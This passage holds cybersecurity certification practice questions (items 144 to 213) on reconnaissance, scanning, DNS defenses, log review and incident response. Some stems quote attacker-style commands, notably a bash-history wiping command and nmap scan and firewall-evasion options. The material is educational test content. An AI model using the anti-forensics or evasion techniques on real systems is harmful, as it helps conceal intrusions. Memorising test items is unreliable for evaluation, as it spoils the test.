    > mail:*:16820:0:99999:7:::
    > news:*:16820:0:99999:7:::
    > uucp:*:16820:0:99999:7:::
    > proxy:*:16820:0:99999:7:::
    > www-data:*:16820:0:99999:7:::
    > backup:*:16820:0:99999:7:::
    > list:*:16820:0:99999:7:::
    > irc:*:16820:0:99999:7:::
    
    1. The root account has been compromised.
    2. An account named daemon has been added.
    3. The shadow password file has been modified.
    4. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.
  144. While conducting a topology scan of a remote web server, Susan notes that the IP addresses returned for the same DNS entry change over time. What has she likely encountered?

    1. A route change
    2. Fast flux DNS
    3. A load balancer
    4. An IP mismatch
  145. Attackers have been attempting to log into Alaina’s Cisco routers, causing thousands of log entries, and she is worried they may eventually succeed. Which of the following options should she recommend to resolve this issue?

    1. Prevent console login via ssh.
    2. Implement a login-block feature with back-off settings.
    3. Move the administrative interface to a protected network.
    4. Disable console access entirely.
  146. Ron is reviewing his team’s work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here?

    Window shows table with columns for number, time, source, destination (10.0.2.15), protocol (UDP), length (60), and info.

    1. The host was not up.
    2. Not all ports were scanned.
    3. The scan scanned only UDP ports.
    4. The scan was not run as root.
  147. John needs to protect his organization’s authentication system against brute-force attacks. Which of the following control pairs are best suited to preventing a brute-force attack from succeeding if ease of use and maintenance is also important?

    1. Passwords and PINs
    2. Passwords and biometrics
    3. Passwords and token-based authentication
    4. Token-based authentication and biometrics
  148. While reviewing the command history for an administrative user, Chris discovers a suspicious command that was captured, shown here:

    ln /dev/null ~/.bash_history
    

    What action was this user attempting to perform?

    1. Enabling the bash history
    2. Appending the contents of /dev/null to the bash history
    3. Logging all shell commands to /dev/null
    4. Allowing remote access from the null shell
  149. While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart:

    service rogueservice stop
    

    After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this?

    1. The service restarted at reboot; she needs to include the "-p", or permanent flag.
    2. The service restarted itself; she needs to delete the binary associated with the service.
    3. The service restarted at reboot; she should add an .override file to stop the service from starting.
    4. A malicious user restarted the service; she needs to ensure users cannot restart services.
  150. Lucca wants to validate DNS responses to ensure that they are from authoritative DNS servers. What technology can he use to do this?

    1. DNSSEC
    2. DNSCrypt
    3. DNShield
    4. DNS is an open protocol and does not support secure validation.
  151. Nathan has been asked to monitor and manage the environment in which a cybersecurity exercise is conducted. What team is he on?

    1. Red team
    2. White team
    3. Blue team
    4. Black team
  152. Allan’s nmap scan includes a line that starts with cpe:/o. What type of information should he expect to gather from the entry?

    1. Common privilege escalation
    2. Operating system
    3. Certificate performance evaluation
    4. Hardware identification
  153. Which of the following items is not typically included in the rules of engagement for a penetration test?

    1. Timing
    2. Authorization
    3. Scope
    4. Authorized tools
  154. Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS?

    1. Route poisoning
    2. Anti-malware router filters
    3. Subdomain whitelisting
    4. DNS blackholing
  155. While scanning a network, Frank discovers a host running a service on TCP ports 1812 and 1813. What type of server has Frank most likely discovered?

    1. RADIUS
    2. VNC
    3. Kerberos
    4. Postgres
  156. While reviewing output from netstat, John sees the following output. What should his next action be?

    [minesweeper.exe]
      TCP    127.0.0.1:62522        dynamo:0               LISTENING
    [minesweeper.exe]
      TCP    192.168.1.100        151.101.2.69:https           ESTABLISHED
    
    1. Capture traffic to 151.101.2.69 using Wireshark.
    2. Initiate the organization’s incident response plan.
    3. Check to see whether 151.101.2.69 is a valid Microsoft address.
    4. Ignore it, because this is a false positive.
  157. Shane wants to conduct an nmap scan of a firewalled subnet. Which of the following is not an nmap firewall evasion technique he could use?

    1. Fragmenting packets
    2. Changing packet header flags
    3. Spoofing the source IP
    4. Appending random data
  158. Alex is observing a penetration tester who has gained access to a Windows domain controller. The penetration tester runs a program called fgdump and gathers information from the system. What type of information has the penetration tester targeted?

    1. File and group information
    2. Password and usernames
    3. Active Directory full GPO lists
    4. Nothing, because FGDump is a Linux tool.
  159. Which of the following commands will provide Ben with the most information about a host?

    1. dig -x [ip address]
    2. host [ip address]
    3. nslookup [ip address]
    4. zonet [ip address]
  160. Selah suspects that the Linux system she has just logged into may be Trojaned and wants to check where the bash shell she is running is being executed from. What command should she run to determine this?

    1. where bash
    2. ls -l bash
    3. which bash
    4. printenv bash
  161. Adam needs to provide ssh access to systems behind his data center firewall. If Adam’s organization uses the system architecture shown here, what is the system at point A called?

    Flow diagram shows computer leads to Internet (TCP 22/ssh connection) and vice versa, Internet leads to firewall or unified security device and vice versa, firewall or unified security device leads to device A and vice versa, et cetera.

    1. A firewall-hopper
    2. An isolated system
    3. A moat-protected host
    4. A jump box
  162. Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11?

    1. iptables -A OUTPUT -d 10.24.31.11 -j DROP
    2. iptables -A INPUT -d 10.24.31.11 -j ADD
    3. iptables -block -host 10.24.31.11 -j DROP
    4. iptables -block -ip 10.24.31.11 -j ADD
  163. Fred’s reconnaissance of an organization includes a search of the Censys network search engine. There, he discovers multiple certificates with validity dates as shown here:

    Validity

    2016-07-07 00:00:00 to 2017-08-11 23:59:59 (400 days, 23:59:59)

    2016-07-08 00:00:00 to 2017-08-12 23:59:59 (400 days, 23:59:59)

    2017-07-11 00:00:00 to 2018-08-15 23:59:59 (400 days, 23:59:59)

    What should Fred record in his reconnaissance notes?

    1. The certificates expired as expected, showing proper business practice.
    2. The certificates were expired by the CA, possibly due to nonpayment.
    3. The system that hosts the certificates may have been compromised.
    4. The CA may have been compromised, leading to certificate expiration.
  164. After receiving a penetration test report, Rick has decided to implement anti-harvesting techniques for his organization’s DNS. Which of the following sets of techniques is best suited to preventing bulk and automated information gathering?

    1. CAPTCHA and proxy services
    2. Rate limiting and CAPTCHA
    3. Not publishing TLD zone files and blacklisting
    4. CAPTCHA and blacklisting
  165. When Casey scanned a network host, she received the results shown here. What does she know based on the scan results?

    Table shows columns for PORT, STATE (open), SERVICE (cisco-sscp, http), and VERSION.

    1. The device is a Cisco device.
    2. The device is running CentOS.
    3. The device was built by IBM.
    4. None of the above
  166. What is a document that lists sensitive data-handling rules, contact information, black-box testing, and status meeting schedules called during a penetration test?

    1. The “get out of jail free” card
    2. The rules of engagement
    3. Executive sign-off
    4. A penetration test standard
  167. Fred conducts an SNMP sweep of a target organization and receives no-response replies from multiple addresses that he believes belong to active hosts. What does this mean?

    1. The machines are unreachable.
    2. The machines are not running SNMP servers.
    3. The community string he used is invalid.
    4. Any or all of the above may be true.
  168. Angela wants to gather detailed information about the hosts on a network passively. If she has access to a Wireshark pcap file from the network, which of the following tools can she use to provide automated analysis of the file?

    1. ettercap
    2. NetworkMiner
    3. Sharkbait
    4. dradis
  169. Rick’s security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up?

    1. A tarpit
    2. A honeypot
    3. A honeynet
    4. A blackhole
  170. While performing reconnaissance of an organization’s network, Angela discovers that web.organization.com, www.organization.com, and documents.organization.com all point to the same host. What type of DNS record allows this?

    1. A CNAME
    2. An MX record
    3. An SPF record
    4. An SOA record
  171. Susan wants to prevent attackers from running specific files and also wants to lock down other parts of the Windows operating system to limit the impact of attackers who have access to workstations she is responsible for. If she wants to do this on Windows 10 workstations, what tool should she use?

    1. Secpol.msc
    2. FileVault
    3. AppLocker
  172. While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:

    Aug  6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1  user=root
    Aug  6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3
    Aug  6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
    Aug  6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
    Aug  6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
    

    Which of the following has not occurred?

    1. A user has attempted to re-authenticate too many times.
    2. PAM is configured for three retries and will reject any additional retries in the same session.
    3. Fail2ban has blocked the ssh login attempts.
    4. Root is attempting to log in via ssh from the local host.
  173. Chris operates the point-of-sale network for a company that accepts credit cards and is thus required to be compliant with PCI-DSS. During his regular assessment of the point-of-sale terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris’s best option to stay compliant with PCI-DSS and protect his vulnerable systems?

    1. Replace the Windows embedded point-of-sale terminals with standard Windows systems.
    2. Build a custom operating system image that includes the patch.
    3. Identify, implement, and document compensating controls.
    4. Remove the POS terminals from the network until the vendor releases a patch.
  174. Senior management in Adam’s company recently read a number of articles about massive ransomware attacks that successfully targeted organizations like the one that Adam is a part of. Adam’s organization already uses layered security solutions including a border IPS, firewalls between network zones, local host firewalls, antivirus software, and a configuration management system that applies recommended operating system best practice settings to their workstations. What should Adam recommend to minimize the impact of a similar ransomware outbreak at his organization?

    1. Honeypots
    2. Backups
    3. Anti-malware software
    4. A next-generation firewall appliance
  175. Which of the following tools is not typically associated with the reconnaissance phase of a penetration test?

    1. Metasploit
    2. nmap
    3. Nessus
    4. Maltego
  176. What occurs when Alex uses the following command to perform an nmap scan of a network?

    nmap -sP 192.168.2.0/24
    
    1. A secure port scan of all hosts in the 192.168.0.0 to 192.168.2.255 network range
    2. A scan of all hosts that respond to ping in the 192.168.0.0 to 192.168.255.255 network range
    3. A scan of all hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 network range
    4. A SYN-based portscan of all hosts in the 192.168.2.0 to 192.168.2.255 network range
  177. As part of her malware analysis process, Kara builds a diagram of the components of the suspected malware package. At each stage, she unpacks, de-obfuscates, and identifies each subcomponent, adding it to her diagram. What is this process known as?

    Flow diagram shows suspected malware leads to system resources and packer identified, system resources leads to components and (config.ini, suspect.dll), packer identified leads to file unpacked, which leads to base64decoded.

    1. Decomposition
    2. Disassembly
    3. Reverse archiving
    4. Fingerprinting
  178. Aubrey is reviewing her firewall logs for signs of attacks in her role as a blue team member during a penetration test. Which of the following types of attack is she least likely to be able to identify using a stateful packet inspection firewall?

    1. A SYN flood
    2. A SQL injection attack
    3. A port scan
    4. A DDoS attack
  179. Geoff’s remote scans of a target organization’s class C network block using nmap (nmap -sS 10.0.10.1/24) show only a single web server. If Geoff needs to gather additional reconnaissance information about the organization’s network, which of the following scanning techniques is most likely to provide additional detail?

    1. Use a UDP scan.
    2. Perform a scan from on-site.
    3. Scan using the -p 1-65535 flag.
    4. Use nmap’s IPS evasion techniques.
  180. During her normal daily review process, Jennifer detects an external system that is systematically conducting traceroute operations to each of the systems and devices in her network. What activity is most likely occurring?

    1. A regularly scheduled network scan from her company’s ISP
    2. A vulnerability scan
    3. Network topology reconnaissance
    4. Router probes to determine the best routes via BGP discovery
  181. Why does the U.S. government require Trusted Foundry and related requirements for technology?

    1. To control prices
    2. To ensure standards compatibility
    3. To prevent hardware-level compromise of devices
    4. To ensure U.S.-based supplier viability for strategic components
  182. As part of an externally accessible information review by their security team, Bob and Lisa receive information that the security team gathered including the following entry:

    Query Results:
    Router: Ashburn, VA - US
    Command: show bgp ipv4 unicast 10.81.254.195 
    BGP routing table entry for 10.64.0.0/11
    Versions:
      Process           bRIB/RIB  SendTblVer
      Speaker          287479994   287479994
    Last Modified: Feb 22 09:16:16.154 for 8w0d
    Paths: (13 available, best #13)
      Advertised to update-groups (with more than one peer):
        0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45 
      Advertised to peers (in unique update groups):
        10.250.31.182  
      Path #1: Received by speaker 0
      Not advertised to any peer
      7922
        10.242.151.65 (metric 6710) from  (129.250.0.162)
          Origin IGP, metric 4294967294, localpref 98, valid, confed-internal
          Received Path ID 0, Local Path ID 0, version 0
          Community: 2914:390 2914:1006 2914:2000 2914:3000 65504:7922
          Originator: 10.250.0.162, Cluster list: 10.250.0.9
        ....
     Path #13: Received by speaker 0
      Advertised to update-groups (with more than one peer):
        0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45 
      Advertised to peers (in unique update groups):
        10.250.31.182  
      7922
    

    What type of tool could they use to gather this publicly available information about their systems in the future?

    1. nmap
    2. A BGP looking glass
    3. A BGP reflector
    4. A route/path assimilator
  183. A system that Jeff is responsible for has been experiencing consistent denial-of-service attacks using a version of the Low Orbit Ion Cannon (LOIC) that leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Jeff use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem?

    1. IP-based blacklisting
    2. Drop all SYN packets.
    3. Use a connection rate or volume-limiting filter per IP.
    4. Use a route-blocking filter that analyzes common LOIC routes.
  184. Chris wants to limit the ability of attackers to conduct passive fingerprinting exercises on his network. Which of the following practices will help to mitigate this risk?

    1. Implement an IPS.
    2. Implement a firewall.
    3. Disable promiscuous mode for NICs.
    4. Enable promiscuous mode for NICs.
  185. Geoff wants to gather a list of all Windows services and their current state using a command-line tool. What tool can he use to gather this information for later processing?

    1. svcctl -l
    2. service list
    3. service -l
    4. sc query
  186. While reviewing Shodan scan data for his organization, Adam finds the following information. What type of system has he discovered?

    Image shows BAS SCADA with options for server: BAS SCADA service HTTPserv:00001, date: Mon, 07 Aug 2017 13:35:26 GMT, content-length: 879, et cetera.

    1. A botnet administration system
    2. A control and data acquisition system
    3. A noncaching web server
    4. A NAS

    Use the following scenario and image to answer the following three questions:

    • While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the following information:

      Image shows options for tasks: 104, 254 thr; 3 running, Load average: 1.65 0.76 0.33, and uptime: 02:16:45, and table shows columns for PID, USER, PRI, NI, VIRT, RES, SHR, S, CPU percent, MEM percent, TIME plus, and command.
  187. What issue should Amanda report to the system administrator?

    1. High network utilization
    2. High memory utilization
    3. Insufficient swap space
    4. High CPU utilization
  188. What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?

    1. ps
    2. top
    3. proc
    4. load
  189. What command can Amanda use to terminate the process?

    1. term
    2. stop
    3. end
    4. kill
  190. During Geoff’s configuration of his organization’s network access control policies, he sets up client OS rules that include the following statements:

    ALLOW Windows 7 version *, Windows 10 version *
    ALLOW OSX version *
    ALLOW iOS 8.1, iOS 9 version *
    ALLOW Android 7.*
    

    After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring?

    1. Insecure clients
    2. Incorrect NAC client versions
    3. OS version mismatch
    4. Patch-level mismatch
  191. Lauren submits a suspected malware file to malwr.com and receives the following information about its behavior. What type of tool is malwr.com?

    Sheet shows signatures with markings for process attempted to delay analysis task, file has been identified by at least one AntiVirus on VirusTotal as malicious, binary likely contains encrypted or compressed data, et cetera.

    1. A reverse-engineering tool
    2. A static analysis sandbox
    3. A dynamic analysis sandbox
    4. A decompiler sandbox
  192. Fred has been tasked with configuring his organization’s NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user’s job?

    1. Time-based
    2. Rule-based
    3. Role-based
    4. Location-based
  193. Charles is investigating a process that he believes may be malicious. What Linux command can he use to determine what files that process has open?

    1. ps
    2. procmap
    3. lsof
    4. filemap
  194. After a popular website is hacked, Chris begins to hear reports that email addresses from his company’s domain are listed in the hacker’s data dump. Chris knows that the list includes passwords and is concerned that his users may have used the same password for the site and their own company account. If the hackers recovered MD5 hashed passwords, how can he check them against the strong password hashes his company uses?

    1. Reverse the MD5 hashes and then rehash using the company’s method and compare.
    2. Reverse the MD5 and strong company hashes and then compare the password.
    3. Use rainbow tables to recover the passwords from the dump and then rehash using the company’s strong method and compare.
    4. Chris cannot accomplish this task; hashes cannot be reversed.
  195. As part of his active reconnaissance activities, Frank is provided with a shell account accessible via ssh. If Frank wants to run a default nmap scan on the network behind the firewall shown here, how can he accomplish this?

    Flow diagram shows external host leads to shell host: 192.168.34.11 via firewall with marking for internal protected network 192.168.34.0-192.168.34.255.

    1. ssh -t 192.168.34.11 nmap 192.168.34.0/24
    2. ssh -R 8080:192.168.34.11:8080 [remote account:remote password]
    3. ssh -proxy 192.168.11 [remote account:remote password]
    4. Frank cannot scan multiple ports with a single ssh command.
  196. Angela captured the following packets during a reconnaissance effort run by her organization’s red team. What type of information are they looking for?

    Window shows table with columns for number, time, source, destination (10.0.2.4, 10.0.2.15), protocol (HTTP), length (262, 575, 235), and info.

    1. Vulnerable web applications
    2. SQL injection
    3. Directory traversal attacks
    4. Passwords
  197. Which sources are most commonly used to gather information about technologies a target organization uses during intelligence gathering?

    1. OSINT searches of support forums and social engineering
    2. Port scanning and social engineering
    3. Social media review and document metadata
    4. Social engineering and document metadata
  198. Geoff wants to prevent spammers from harvesting his organization’s public LDAP directory. What technology should he implement?

    1. A firewall
    2. An IDS
    3. Set hard limits
    4. Require authentication
  199. How can Saria remediate the issue shown here in the MBSA screenshot?

    Window shows Microsoft Baseline Security Analyzer with columns for score, user (administrator, DefaultAccount, guest, defaultuser0), weak password (weak), locked out, and disabled.

    1. Force all users to set a complex password.
    2. Set a minimum password age.
    3. Enforce password expiration.
    4. This is not a problem.
  200. Greg configures his next-generation firewall security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Greg controls that advises them they were prevented from visiting a malicious site. What is this technique known as?

    1. DNS masquerading
    2. DNS sinkholing
    3. DNS re-sequencing
    4. DNS hierarchy revision
  201. While reviewing a malware sample, Adam discovers that code inside of it appears to be obfuscated. Which of the following encoding methods is commonly used to prevent code from being easily read by simply opening the file?

    1. QR coding
    2. Base64
    3. Base128
    4. XINT
  202. Jennifer is an Active Directory domain administrator for her company and knows that a quickly spreading botnet relies on a series of domain names for command and control and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command-and-control systems?

    1. Force a BGP update.
    2. Set up a DNS sinkhole.
    3. Modify the hosts file.
    4. Install an anti-malware application.
  203. Charleen works for a U.S. government contractor that uses NIST’s definitions to describe threat categories. How should she categorize the threat posed by competitors that might seek to compromise her organization’s website?

    1. Adversarial
    2. Accidental
    3. Structural
    4. Environmental
  204. Chris has been asked to assess the technical impact of suspected reconnaissance performed against his organization. He is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Chris categorize the technical impact of this type of reconnaissance?

    1. High
    2. Medium
    3. Low
    4. He cannot determine this from the information given.
  205. Frank is creating the scope worksheet for his organization’s penetration test. Which of the following techniques is not typically included in a penetration test?

    1. Reverse engineering
    2. Social engineering
    3. Denial-of-service attacks
    4. Physical penetration attempts
  206. Allan needs to immediately shut down a service called Explorer.exe on a Windows server. Which of the following methods is not a viable option for him?

    1. Use sc.
    2. Use wmic.
    3. Use secpol.msc.
    4. Use services.msc.
  207. Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing?

    ICMP "Echo request"
    Date flow start   Duration       Proto         Src IP Addr:Port->Dst IP Addr:Port   Packets   Bytes   Flows
    2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.6:8.0             11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.6:0->10.1.1.1:0.0             11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.7:8.0             11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.7:0->10.1.1.1:0.0             11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.8:8.0             11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.8:0->10.1.1.1:0.0             11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.9:8.0             11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.9:0->10.1.1.1:0.0             11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.10:8.0            11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.10:0->10.1.1.1:0.0            11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.6:11.0            11        924     1
    2017-07-11        04:58:59.518   10.000 ICMP   10.2.2.11:0->10.1.1.1:0.0            11        924     1
    
    1. A port scan
    2. A failed three-way handshake
    3. A ping sweep
    4. A traceroute
  208. Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?

    Window shows table with columns for number, time, source, destination (10.0.2.15, 10.0.2.4), protocol (ARP, DNS, TCP), length, and info.

    1. The host does not have a DNS entry.
    2. It is running a service on port 139.
    3. It is running a service on port 445.
    4. It is a Windows system.
  209. Stacey encountered a system that shows as “filtered” and “firewalled” during an nmap scan. Which of the following techniques should she not consider as she is planning her next scan?

    1. Packet fragmentation
    2. Spoofing the source address
    3. Using decoy scans
    4. Spoofing the destination address
  210. When Charleen attempts to visit a website, she receives a DNS response from the DNS cache server that her organization relies on that points to the wrong IP address. What attack has occurred?

    1. DNS brute forcing
    2. ARP spoofing
    3. DNS poisoning
    4. MAC spoofing
  211. Alex has been asked to implement network controls to ensure that users who authenticate to the network are physically in the building that the network they are authenticating to serves. What technology and tool should he use to do this?

    1. Geo-IP and port security
    2. GPS location and NAC
    3. GPS location and port-security
    4. Geo-IP and NAC
  212. As part of a penetration testing exercise, Lauren is placed on the defending team for her organization. What is this team often called?

    1. The red team
    2. The white team
    3. The blue team
    4. The yellow team
  213. Lucca wants to lock down a Cisco router, and chooses to use documentation that Cisco provides. What type of documentation is this?

    1. Primary documentation
    2. OEM documentation
    3. Crowd-sourced documentation
    4. System documentation